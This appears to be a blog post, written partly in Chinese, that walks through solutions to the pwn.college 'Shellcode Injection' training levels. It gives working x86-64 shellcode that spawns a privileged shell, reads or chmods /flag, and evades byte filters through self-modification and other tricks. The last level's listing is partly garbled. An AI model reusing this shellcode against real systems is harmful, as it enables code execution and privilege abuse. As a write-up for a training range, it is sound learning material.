

<!DOCTYPE html>
<html lang="zh-CN" data-default-color-scheme=auto>



<head>
  <meta charset="UTF-8">
  <link rel="apple-touch-icon" sizes="76x76" href="/img/fluid.png">
  <link rel="icon" href="/img/bg/favicon.ico">
  <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=5.0, shrink-to-fit=no">
  <meta http-equiv="x-ua-compatible" content="ie=edge">
  
    <meta http-equiv="Content-Security-Policy" content="upgrade-insecure-requests">
  
  <meta name="theme-color" content="#2f4154">
  <meta name="author" content="Adam">
  <meta name="keywords" content="">
  
    <meta name="description" content="Level 012345678910111213141516171819202122232425262728&#x2F;* execve(path&#x3D;&amp;#x27;&#x2F;bin&#x2F;&#x2F;&#x2F;sh&amp;#x27;, argv&#x3D;[&amp;#x27;sh&amp;#x27;,&amp;#x27;-p&amp;#x27;], envp&#x3D;0) *&#x2F;    &#x2F;* push b&amp;#x27;&#x2F;bin&#x2F;&#x2F;&#x2F;sh\x00&amp;#x27; *&#x2F;    push 0x68    mo">
<meta property="og:type" content="article">
<meta property="og:title" content="pwn.college: Shellcode Injection">
<meta property="og:url" content="https://adamyoung71.github.io/2022/03/07/2022-3-7-Shellcode-Injection/index.html">
<meta property="og:site_name" content="Hexo">
<meta property="og:description" content="Level 012345678910111213141516171819202122232425262728&#x2F;* execve(path&#x3D;&amp;#x27;&#x2F;bin&#x2F;&#x2F;&#x2F;sh&amp;#x27;, argv&#x3D;[&amp;#x27;sh&amp;#x27;,&amp;#x27;-p&amp;#x27;], envp&#x3D;0) *&#x2F;    &#x2F;* push b&amp;#x27;&#x2F;bin&#x2F;&#x2F;&#x2F;sh\x00&amp;#x27; *&#x2F;    push 0x68    mo">
<meta property="og:locale" content="zh_CN">
<meta property="article:published_time" content="2022-03-07T20:00:00.000Z">
<meta property="article:modified_time" content="2023-01-28T14:44:52.472Z">
<meta property="article:author" content="杨庭屹">
<meta property="article:tag" content="pwn.college">
<meta property="article:tag" content="Shellcode">
<meta name="twitter:card" content="summary_large_image">
  
  
  
  <title>pwn.college: Shellcode Injection - Hexo</title>

  <link  rel="stylesheet" href="https://lib.baomitu.com/twitter-bootstrap/4.6.1/css/bootstrap.min.css" />



  <link  rel="stylesheet" href="https://lib.baomitu.com/github-markdown-css/4.0.0/github-markdown.min.css" />

  <link  rel="stylesheet" href="https://lib.baomitu.com/hint.css/2.7.0/hint.min.css" />

  <link  rel="stylesheet" href="https://lib.baomitu.com/fancybox/3.5.7/jquery.fancybox.min.css" />



<!-- 主题依赖的图标库，不要自行修改 -->
<!-- Do not modify the link that theme dependent icons -->

<link rel="stylesheet" href="//at.alicdn.com/t/font_1749284_hj8rtnfg7um.css">



<link rel="stylesheet" href="//at.alicdn.com/t/font_1736178_lbnruvf0jn.css">


<link  rel="stylesheet" href="/css/main.css" />


  <link id="highlight-css" rel="stylesheet" href="/css/highlight.css" />
  
    <link id="highlight-css-dark" rel="stylesheet" href="/css/highlight-dark.css" />
  




  <script id="fluid-configs">
    var Fluid = window.Fluid || {};
    Fluid.ctx = Object.assign({}, Fluid.ctx)
    var CONFIG = {"hostname":"adamyoung71.github.io","root":"/","version":"1.9.4","typing":{"enable":true,"typeSpeed":70,"cursorChar":"_","loop":false,"scope":[]},"anchorjs":{"enable":true,"element":"h1,h2,h3,h4,h5,h6","placement":"left","visible":"hover","icon":""},"progressbar":{"enable":true,"height_px":3,"color":"#29d","options":{"showSpinner":false,"trickleSpeed":100}},"code_language":{"enable":true,"default":"TEXT"},"copy_btn":true,"image_caption":{"enable":true},"image_zoom":{"enable":true,"img_url_replace":["",""]},"toc":{"enable":true,"placement":"right","headingSelector":"h1,h2,h3,h4,h5,h6","collapseDepth":0},"lazyload":{"enable":true,"loading_img":"/img/loading.gif","onlypost":false,"offset_factor":2},"web_analytics":{"enable":false,"follow_dnt":true,"baidu":null,"google":null,"gtag":null,"tencent":{"sid":null,"cid":null},"woyaola":null,"cnzz":null,"leancloud":{"app_id":null,"app_key":null,"server_url":null,"path":"window.location.pathname","ignore_local":false}},"search_path":"/local-search.xml"};

    if (CONFIG.web_analytics.follow_dnt) {
      var dntVal = navigator.doNotTrack || window.doNotTrack || navigator.msDoNotTrack;
      Fluid.ctx.dnt = dntVal && (dntVal.startsWith('1') || dntVal.startsWith('yes') || dntVal.startsWith('on'));
    }
  </script>
  <script  src="/js/utils.js" ></script>
  <script  src="/js/color-schema.js" ></script>
  


  
<meta name="generator" content="Hexo 6.3.0"></head>


<body>
  

  <header>
    

<div class="header-inner" style="height: 70vh;">
  <nav id="navbar" class="navbar fixed-top  navbar-expand-lg navbar-dark scrolling-navbar">
  <div class="container">
    <a class="navbar-brand" href="/">
      <strong>Adam&#39;s Blog</strong>
    </a>

    <button id="navbar-toggler-btn" class="navbar-toggler" type="button" data-toggle="collapse"
            data-target="#navbarSupportedContent"
            aria-controls="navbarSupportedContent" aria-expanded="false" aria-label="Toggle navigation">
      <div class="animated-icon"><span></span><span></span><span></span></div>
    </button>

    <!-- Collapsible content -->
    <div class="collapse navbar-collapse" id="navbarSupportedContent">
      <ul class="navbar-nav ml-auto text-center">
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/">
                <i class="iconfont icon-home-fill"></i>
                <span>首页</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/archives/">
                <i class="iconfont icon-archive-fill"></i>
                <span>归档</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/categories/">
                <i class="iconfont icon-category-fill"></i>
                <span>分类</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/tags/">
                <i class="iconfont icon-tags-fill"></i>
                <span>标签</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/about/">
                <i class="iconfont icon-user-fill"></i>
                <span>关于</span>
              </a>
            </li>
          
        
        
          <li class="nav-item" id="search-btn">
            <a class="nav-link" target="_self" href="javascript:;" data-toggle="modal" data-target="#modalSearch" aria-label="Search">
              <i class="iconfont icon-search"></i>
            </a>
          </li>
          
        
        
          <li class="nav-item" id="color-toggle-btn">
            <a class="nav-link" target="_self" href="javascript:;" aria-label="Color Toggle">
              <i class="iconfont icon-dark" id="color-toggle-icon"></i>
            </a>
          </li>
        
      </ul>
    </div>
  </div>
</nav>

  

<div id="banner" class="banner" parallax=true
     style="background: url('/img/default.png') no-repeat center center; background-size: cover;">
  <div class="full-bg-img">
    <div class="mask flex-center" style="background-color: rgba(0, 0, 0, 0.3)">
      <div class="banner-text text-center fade-in-up">
        <div class="h2">
          
            <span id="subtitle" data-typed-text="pwn.college: Shellcode Injection"></span>
          
        </div>

        
          
  <div class="mt-3">
    
    
      <span class="post-meta">
        <i class="iconfont icon-date-fill" aria-hidden="true"></i>
        <time datetime="2022-03-07 20:00" pubdate>
          2022年3月7日 晚上
        </time>
      </span>
    
  </div>

  <div class="mt-1">
    
      <span class="post-meta mr-2">
        <i class="iconfont icon-chart"></i>
        
          6.9k 字
        
      </span>
    

    
      <span class="post-meta mr-2">
        <i class="iconfont icon-clock-fill"></i>
        
        
        
          58 分钟
        
      </span>
    

    
    
  </div>


        
      </div>

      
    </div>
  </div>
</div>

</div>

  </header>

  <main>
    
      

<div class="container-fluid nopadding-x">
  <div class="row nomargin-x">
    <div class="side-col d-none d-lg-block col-lg-2">
      

    </div>

    <div class="col-lg-8 nopadding-x-md">
      <div class="container nopadding-x-md" id="board-ctn">
        <div id="board">
          <article class="post-content mx-auto">
            <!-- SEO header -->
            <h1 style="display: none">pwn.college: Shellcode Injection</h1>
            
            
              <div class="markdown-body">
                
                <h4 id="Level-0"><a href="#Level-0" class="headerlink" title="Level 0"></a>Level 0</h4><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br></pre></td><td class="code"><pre><code class="hljs assembly">/* execve(path=&#x27;/bin///sh&#x27;, argv=[&#x27;sh&#x27;,&#x27;-p&#x27;], envp=0) */<br>    /* push b&#x27;/bin///sh\x00&#x27; */<br>    push 0x68<br>    mov rax, 0x732f2f2f6e69622f<br>    push rax<br>    mov rdi, rsp<br>    /* push argument array [&#x27;sh\x00&#x27;, &#x27;-p\x00&#x27;] */<br>    /* push b&#x27;sh\x00-p\x00&#x27; */<br>    mov rax, 0x101010101010101<br>    push rax<br>    mov rax, 0x101010101010101 ^ 0x702d006873<br>    xor [rsp], rax<br>    xor esi, esi /* 0 */<br>    push rsi /* null terminate */<br>    push 0xb<br>    pop rsi<br>    add rsi, rsp<br>    push rsi /* &#x27;-p\x00&#x27; */<br>    push 0x10<br>    pop rsi<br>    add rsi, rsp<br>    push rsi /* &#x27;sh\x00&#x27; */<br>    mov rsi, rsp<br>    xor edx, edx /* 0 */<br>    /* call execve() */<br>    push SYS_execve /* 0x3b */<br>    pop rax<br>    syscall<br></code></pre></td></tr></table></figure>



<h4 id="Level-2"><a href="#Level-2" class="headerlink" title="Level 2"></a>Level 2</h4><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><code class="hljs assembly">mov rbx, 0x00000067616c662f	# push &quot;/flag&quot; filename<br>push rbx<br>mov rax, 2				# syscall number of open<br>mov rdi, rsp				# point the first argument at stack (&quot;/flag&quot;).<br>mov rsi, 0				# NULL out the second argument (meaning, O_RDONLY).<br>syscall				# trigger open(&quot;/flag&quot;, NULL).<br><br>mov rdi, 1				# first argument to sendfile is the file descriptor to output to (stdout).<br>mov rsi, rax				# second argument is the file descriptor returned by open<br>mov rdx, 0				# third argument is the number of bytes to skip from the input file<br>mov r10, 1000				# fourth argument is the number of bytes to transfer to the output file<br>mov rax, 40				# syscall number of sendfile<br>syscall				# trigger sendfile(1, fd, 0, 1000).<br><br>mov rax, 60				# syscall number of exit<br>syscall				# trigger exit().<br></code></pre></td></tr></table></figure>



<h4 id="Level-3"><a href="#Level-3" class="headerlink" title="Level 3"></a>Level 3</h4><p>This challenge requires that your shellcode have no NULL bytes!</p>
<p><code>gcc -static -nostdlib file.s -o file.elf ; objcopy --dump-section .text=file.bin file.elf ; hd file.bin</code></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br></pre></td><td class="code"><pre><code class="hljs assembly">.global _start<br>.intel_syntax noprefix<br>_start:<br>xor rax, rax<br>mov al, 0x67<br>shl rax, 0x20<br>xor rbx, rbx<br>mov ebx, 0x616c662f<br>add rbx, rax<br>push rbx<br>xor rax, rax<br>mov al, 2<br>mov rdi, rsp<br>xor rsi, rsi<br>syscall<br><br>xor rdi, rdi<br>inc rdi<br>mov rsi, rax<br>xor rdx, rdx<br>xor rax, rax<br>mov al, 0xff<br>mov r10, rax<br>xor rax, rax<br>mov al, 0x28<br>syscall<br><br>xor rax, rax<br>mov al, 0x3c<br>syscall<br></code></pre></td></tr></table></figure>

<h4 id="Level-4"><a href="#Level-4" class="headerlink" title="Level 4"></a>Level 4</h4><p>This challenge requires that your shellcode have no H bytes!</p>
<p>不让用H就是说不能用64位的mov及相关的xor, or, shl指令，但是可以用32位指令，而且push和pop到rax不影响。</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br></pre></td><td class="code"><pre><code class="hljs assembly">/* execve(path=&#x27;/bin///sh&#x27;, argv=[&#x27;sh&#x27;,&#x27;-p&#x27;], envp=0) */<br>    /* push b&#x27;/bin///sh\x00&#x27; */<br>    push 0x68<br>    //mov rax, 0x732f2f2f6e69622f<br>    //push rax<br>    push 0x6e69622f<br>    mov dword ptr [rsp+4],0x732f2f2f<br>    //mov rdi, rsp<br>    push rsp<br>    pop rdi<br>    /* push argument array [&#x27;sh\x00&#x27;, &#x27;-p\x00&#x27;] */<br>    /* push b&#x27;sh\x00-p\x00&#x27; */<br>    //mov rax, 0x702d006873<br>    //push rax<br>    push 0x2d006873<br>    mov dword ptr [rsp+4],0x70<br>    xor esi, esi /* 0 */<br>    push rsi /* null terminate */<br>    //push 0xb<br>    //pop rsi<br>    //add rsi, rsp<br>    push rsp<br>    add dword ptr [rsp],0xb<br>    //pop rsi<br>    //push rsi /* &#x27;-p\x00&#x27; */<br>    //push 0x10<br>    //pop rsi<br>    //add rsi, rsp<br>    //push rsi /* &#x27;sh\x00&#x27; */<br>    push rsp<br>    add dword ptr [rsp],0x10<br>    //mov rsi, rsp<br>    push rsp<br>    pop rsi<br>    xor edx, edx /* 0 */<br>    /* call execve() */<br>    push 0x3b /* 0x3b */<br>    pop rax<br>    syscall<br></code></pre></td></tr></table></figure>

<h4 id="Level-5"><a href="#Level-5" class="headerlink" title="Level 5"></a>Level 5</h4><blockquote>
<p>This challenge requires that your shellcode does not have any <code>syscall</code>, ‘sysenter’, or <code>int</code> instructions. System calls are too dangerous! This filter works by scanning through the shellcode for the following byte sequences: 0f05(<code>syscall</code>), 0f34 (<code>sysenter</code>), and 80cd (<code>int</code>). One way to evade this is to have your shellcode modify itself to insert the <code>syscall</code> instructions at runtime.</p>
</blockquote>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br></pre></td><td class="code"><pre><code class="hljs assembly">push 0x68<br>    mov rax, 0x732f2f2f6e69622f<br>    push rax<br>    mov rdi, rsp<br>    mov rax, 0x101010101010101<br>    push rax<br>    mov rax, 0x101010101010101 ^ 0x702d006873<br>    xor [rsp], rax<br>    xor esi, esi<br>    push rsi<br>    push 0xb<br>    pop rsi<br>    add rsi, rsp<br>    push rsi<br>    push 0x10<br>    pop rsi<br>    add rsi, rsp<br>    push rsi<br>    mov rsi, rsp<br>    xor edx, edx<br>    push 0x3b<br>    pop rax<br>    push 0x050e<br>    inc qword ptr [rsp]<br>    jmp rsp<br>    nop<br></code></pre></td></tr></table></figure>





<h4 id="Level-6"><a href="#Level-6" class="headerlink" title="Level 6"></a>Level 6</h4><blockquote>
<p>This challenge requires that your shellcode does not have any <code>syscall</code>, ‘sysenter’, or <code>int</code> instructions. System calls are too dangerous! This filter works by scanning through the shellcode for the following byte sequences: 0f05(<code>syscall</code>), 0f34 (<code>sysenter</code>), and 80cd (<code>int</code>). One way to evade this is to have your shellcode modify itself to insert the <code>syscall</code> instructions at runtime.</p>
<p>Removing write permissions from first 4096 bytes of shellcode.</p>
</blockquote>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br></pre></td><td class="code"><pre><code class="hljs assembly">.rept 0x1000<br>    nop<br>    .endr<br>    push 0x68<br>    mov rax, 0x732f2f2f6e69622f<br>    push rax<br>    mov rdi, rsp<br>    mov rax, 0x101010101010101<br>    push rax<br>    mov rax, 0x101010101010101 ^ 0x702d006873<br>    xor [rsp], rax<br>    xor esi, esi<br>    push rsi<br>    push 0xb<br>    pop rsi<br>    add rsi, rsp<br>    push rsi<br>    push 0x10<br>    pop rsi<br>    add rsi, rsp<br>    push rsi<br>    mov rsi, rsp<br>    xor edx, edx<br>    push 0x3b<br>    pop rax<br>    push 0x050e<br>    inc qword ptr [rsp]<br>    jmp rsp<br>    nop<br></code></pre></td></tr></table></figure>

<h4 id="Level-7"><a href="#Level-7" class="headerlink" title="Level 7"></a>Level 7</h4><blockquote>
<p>This challenge is about to close stdin, which means that it will be harder to pass in a stage-2 shellcode. You will need to figure an alternate solution (such as unpacking shellcode in memory) to get past complex filters.</p>
<p>This challenge is about to close stderr, which means that you will not be able to get use file descriptor 2 for output.</p>
<p>This challenge is about to close stdout, which means that you will not be able to get use file descriptor 1 for output. You will see no further output, and will need to figure out an alternate way of communicating data back to yourself.</p>
</blockquote>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><code class="hljs assembly">/* chmod(file=&#x27;/flag&#x27;, mode=4) */<br>/* push b&#x27;/flag\\x00&#x27; */<br>mov rax, 0x101010101010101<br>push rax<br>mov rax, 0x101010101010101 ^ 0x67616c662f<br>xor [rsp], rax<br>mov rdi, rsp<br>push 4<br>pop rsi /* call chmod() */<br>push SYS_chmod /* 0x5a */<br>pop rax<br>syscall<br></code></pre></td></tr></table></figure>

<h4 id="Level-8"><a href="#Level-8" class="headerlink" title="Level 8"></a>Level 8</h4><blockquote>
<p>Reading 0x12 bytes from stdin.</p>
<p>Removing write permissions from first 4096 bytes of shellcode.</p>
</blockquote>
<p>这一题的意思是说要求我们的shellcode要在0x12字节以内。和上一题一样可以用chmod来做。linux有一个特性，chmod在操作软链接时不会作用于软链接，而会直接作用于所指向的文件，这样就不用输入<code>/flag</code>这5个字节了，只需要使用任意自定义一个字节即可。</p>
<p><code> ln -s /flag f</code></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><code class="hljs assembly">/* chmod(file=&#x27;f&#x27;, mode=4) */<br>/* push b&#x27;f\x00&#x27; */<br>push 0x66<br>mov rdi, rsp<br>push 4<br>pop rsi<br>/* call chmod() */<br>push SYS_chmod /* 0x5a */<br>pop rax<br>syscall<br></code></pre></td></tr></table></figure>

<p>新建一个名为<code>a</code>的脚本</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><code class="hljs shell"><span class="hljs-meta prompt_">#</span><span class="language-bash">!/bin/bash -p</span><br>id<br>cat /flag<br></code></pre></td></tr></table></figure>

<p>使用<code>shellcraft.amd64.linux.execve(&#39;a&#39;)</code>获取汇编代码</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><code class="hljs assembly">/* execve(path=&#x27;a&#x27;, argv=0, envp=0) */<br>/* push b&#x27;a\\x00&#x27; */<br>push 0x61<br>mov rdi, rsp<br>xor edx, edx /* 0 */<br>xor esi, esi /* 0 or cdq*/ <br>/* call execve() */<br>mov al,0x3b <br>syscall<br></code></pre></td></tr></table></figure>



<h4 id="Level-9"><a href="#Level-9" class="headerlink" title="Level 9"></a>Level 9</h4><blockquote>
<p>This challenge modified your shellcode by overwriting every other 10 bytes with 0xcc. 0xcc, when interpreted as an<br>instruction is an <code>INT 3</code>, which is an interrupt to call into the debugger. You must avoid these modifications in your<br>shellcode.</p>
</blockquote>
<p>每隔10字节就会用10个中断替换，用循环跳过就行了。</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><code class="hljs assembly">push 0x66<br>mov rdi, rsp<br>push 4<br>pop rsi<br>jmp next<br>.rept 10<br>nop<br>.endr<br>/* call chmod() */<br>next:<br>push SYS_chmod /* 0x5a */<br>pop rax<br>syscall<br></code></pre></td></tr></table></figure>

<h4 id="Level-10"><a href="#Level-10" class="headerlink" title="Level 10"></a>Level 10</h4><blockquote>
<p>This challenge just sorted your shellcode using bubblesort. Keep in mind the impact of memory endianness on this sort<br>(e.g., the LSB being the right-most byte).</p>
<p>This sort processed your shellcode 8 bytes at a time.</p>
</blockquote>
<p>代码同level 9</p>
<h4 id="Level-11"><a href="#Level-11" class="headerlink" title="Level 11"></a>Level 11</h4><blockquote>
<p>This challenge is about to close stdin, which means that it will be harder to pass in a stage-2 shellcode. You will need<br>to figure an alternate solution (such as unpacking shellcode in memory) to get past complex filters.</p>
</blockquote>
<p>代码同level 9</p>
<h4 id="Level-12"><a href="#Level-12" class="headerlink" title="Level 12"></a>Level 12</h4><blockquote>
<p>This challenge requires that every byte in your shellcode is unique!</p>
</blockquote>
<p>说实话这就有点强人所难了，像极了需要特殊解法的奥数题。具体做法就是用不同命令互相进行替换。用上面的代码即可</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><code class="hljs assembly">push 0x63<br>  mov rdi, rsp<br>  xor esi, esi<br>  cdq<br>  mov al,0x3b<br>  syscall<br><br></code></pre></td></tr></table></figure>



<h4 id="Level-13"><a href="#Level-13" class="headerlink" title="Level 13"></a>Level 13</h4><blockquote>
<p>Reading 0xc bytes from stdin.</p>
</blockquote>
<p>还是用上一题的代码。</p>
<h4 id="Level-14"><a href="#Level-14" class="headerlink" title="Level 14"></a>Level 14</h4><blockquote>
<p>Reading 0x6 bytes from stdin.</p>
</blockquote>
<p>这一题直接又把空间砍了一半，推理一下其实可以想到肯定是已经帮我们做了一切工作，不然只用6字节肯定不够，所以说现在的任务就是确定哪些寄存器的值已经被设置好。</p>
<p>&#x2F;* execve(path&#x3D;’&#x2F;bin&#x2F;sh’, argv&#x3D;[‘sh’, ‘-p’], envp&#x3D;0) *&#x2F;</p>
<p>push 0x1010101<br>xor dword ptr [esp], 0x169722e<br>push 0x6e69622f<br>mov ebx, esp\</p>
<p>push 0x70<br>push 0x1010101<br>xor dword ptr [esp], 0x2c016972<br>xor ecx, ecx<br>push ecx<br>push 7<br>pop ecx<br>add ecx, esp<br>push ecx<br>push 8<br>pop ecx<br>add ecx, esp<br>push ecx<br>mov ecx, esp<br>xor edx, edx<br>push 0xb<br>pop eax<br>int 0x80</p>
<p> &#x2F;* execve(path&#x3D;’c’, argv&#x3D;0, envp&#x3D;0) <em>&#x2F;<br> &#x2F;</em> push b’c\x00’ *&#x2F;<br> push 0x63<br> mov rdi, rsp<br> xor edx, edx<br> xor esi, esi<br> push 0x3b<br> pop rax<br>syscall</p>

                
              </div>
            
            <hr/>
            <div>
              <div class="post-metas my-3">
  
  
    <div class="post-meta">
      <i class="iconfont icon-tags"></i>
      
        <a href="/tags/pwn-college/">#pwn.college</a>
      
        <a href="/tags/Shellcode/">#Shellcode</a>
      
    </div>
  
</div>


              
  

  <div class="license-box my-3">
    <div class="license-title">
      <div>pwn.college: Shellcode Injection</div>
      <div>https://adamyoung71.github.io/2022/03/07/2022-3-7-Shellcode-Injection/</div>
    </div>
    <div class="license-meta">
      
        <div class="license-meta-item">
          <div>作者</div>
          <div>Adam</div>
        </div>
      
      
        <div class="license-meta-item license-meta-date">
          <div>发布于</div>
          <div>2022年3月7日</div>
        </div>
      
      
      
        <div class="license-meta-item">
          <div>许可协议</div>
          <div>
            
              
              
                <a target="_blank" href="https://creativecommons.org/licenses/by/4.0/">
                  <span class="hint--top hint--rounded" aria-label="BY - 署名">
                    <i class="iconfont icon-by"></i>
                  </span>
                </a>
              
            
          </div>
        </div>
      
    </div>
    <div class="license-icon iconfont"></div>
  </div>



              
                <div class="post-prevnext my-3">
                  <article class="post-prev col-6">
                    
                    
                      <a href="/2022/03/11/2022-3-11-Computer-Security-II-Web-Cache-Deception/" title="Web Cache Deception Attack Simulation">
                        <i class="iconfont icon-arrowleft"></i>
                        <span class="hidden-mobile">Web Cache Deception Attack Simulation</span>
                        <span class="visible-mobile">上一篇</span>
                      </a>
                    
                  </article>
                  <article class="post-next col-6">
                    
                    
                      <a href="/2022/02/27/2022-2-27-Assembly-Refresher/" title="pwn.college: Assembly Refreasher">
                        <span class="hidden-mobile">pwn.college: Assembly Refreasher</span>
                        <span class="visible-mobile">下一篇</span>
                        <i class="iconfont icon-arrowright"></i>
                      </a>
                    
                  </article>
                </div>
              
            </div>

            
          </article>
        </div>
      </div>
    </div>

    <div class="side-col d-none d-lg-block col-lg-2">
      
  <aside class="sidebar" style="margin-left: -1rem">
    <div id="toc">
  <p class="toc-header">
    <i class="iconfont icon-list"></i>
    <span>目录</span>
  </p>
  <div class="toc-body" id="toc-body"></div>
</div>



  </aside>


    </div>
  </div>
</div>





  



  



  



  



  


  
  









    

    
      <a id="scroll-top-button" aria-label="TOP" href="#" role="button">
        <i class="iconfont icon-arrowup" aria-hidden="true"></i>
      </a>
    

    
      <div class="modal fade" id="modalSearch" tabindex="-1" role="dialog" aria-labelledby="ModalLabel"
     aria-hidden="true">
  <div class="modal-dialog modal-dialog-scrollable modal-lg" role="document">
    <div class="modal-content">
      <div class="modal-header text-center">
        <h4 class="modal-title w-100 font-weight-bold">搜索</h4>
        <button type="button" id="local-search-close" class="close" data-dismiss="modal" aria-label="Close">
          <span aria-hidden="true">&times;</span>
        </button>
      </div>
      <div class="modal-body mx-3">
        <div class="md-form mb-5">
          <input type="text" id="local-search-input" class="form-control validate">
          <label data-error="x" data-success="v" for="local-search-input">关键词</label>
        </div>
        <div class="list-group" id="local-search-result"></div>
      </div>
    </div>
  </div>
</div>

    

    
  </main>

  <footer>
    <div class="footer-inner">
  
    <div class="footer-content">
       <a href="https://hexo.io" target="_blank" rel="nofollow noopener"><span>Hexo</span></a> <i class="iconfont icon-love"></i> <a href="https://github.com/fluid-dev/hexo-theme-fluid" target="_blank" rel="nofollow noopener"><span>Fluid</span></a> 
    </div>
  
  
  
  
</div>

  </footer>

  <!-- Scripts -->
  
  <script  src="https://lib.baomitu.com/nprogress/0.2.0/nprogress.min.js" ></script>
  <link  rel="stylesheet" href="https://lib.baomitu.com/nprogress/0.2.0/nprogress.min.css" />

  <script>
    NProgress.configure({"showSpinner":false,"trickleSpeed":100})
    NProgress.start()
    window.addEventListener('load', function() {
      NProgress.done();
    })
  </script>


<script  src="https://lib.baomitu.com/jquery/3.6.0/jquery.min.js" ></script>
<script  src="https://lib.baomitu.com/twitter-bootstrap/4.6.1/js/bootstrap.min.js" ></script>
